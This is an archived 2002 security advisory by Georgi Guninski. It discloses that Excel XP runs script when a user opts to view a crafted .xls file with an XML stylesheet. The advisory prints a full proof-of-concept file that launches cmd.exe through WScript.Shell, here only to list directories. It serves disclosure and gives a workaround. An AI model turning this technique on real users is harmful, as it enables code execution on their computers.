OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Georgi Guninski (guninskiGUNINSKI.COM)
Date: Fri May 24 2002 - 12:57:41 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Georgi Guninski security advisory #55, 2002

    Excel XP xml stylesheet problems

    Systems affected: Excel XP
    Risk: Low (user interaction required)
    Date: 24 May 2002

    Legal Notice:
    This Advisory is Copyright (c) 2002 Georgi Guninski.
    You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts
    of it without the author's written permission.

    Disclaimer:
    The information in this advisory is believed to be true though
    it may be false.
    The opinions expressed in this advisory and program are my own and
    not of any company. The usual standard disclaimer applies,
    especially the fact that Georgi Guninski is not liable for any damages
    caused by direct or indirect use of the information or functionality
    provided by this advisory or program. Georgi Guninski bears no
    responsibility for content or misuse of this advisory or program or
    any derivatives thereof.
    Anything in this document may change without notice.

    Interesting news:
    According to
    http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
    "...He (MS) later acknowledged that some Microsoft code was so flawed
    it could not be safely disclosed..."
    LOL
    They call this trusthworthy??????

    Description:

    Excel XP tries to play with new technologies like XML and XSLT.
    Unfortunately the Excel seem "so flawed" that if the user
    opens a .xls file and chooses to view it with xml stylesheet arbitrary code
    may be executed. As script kiddies know this may lead to taking full control
    over user's computer. Excel does not give any warning to the user - just asks
    whether to use the style sheet or not. The default option is *not* to
    display with the stylesheet though.

    Details:

    Consider this xls file
    ------xls_sux.xls-----
    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
    <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
    <xsl:script>
    <![CDATA[
    x=new ActiveXObject("WScript.Shell");
    x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
    ]]>
    </xsl:script>
    <msux>
    msux
    written by georgi guninski
    </msux>
    </xsl:stylesheet>
    ----------------------

    It contains both XML and a stylesheet in one file.

    Workaround/Solution:
    Do not choose to use xml stylesheets in Excel if asked.
    poweroff(8) the poor windoze box if you see Excel mentions stylesheets.

    Vendor status: microsoft was notified on 23 May 2002

    Regards,
    Georgi Guninski
    http://www.guninski.com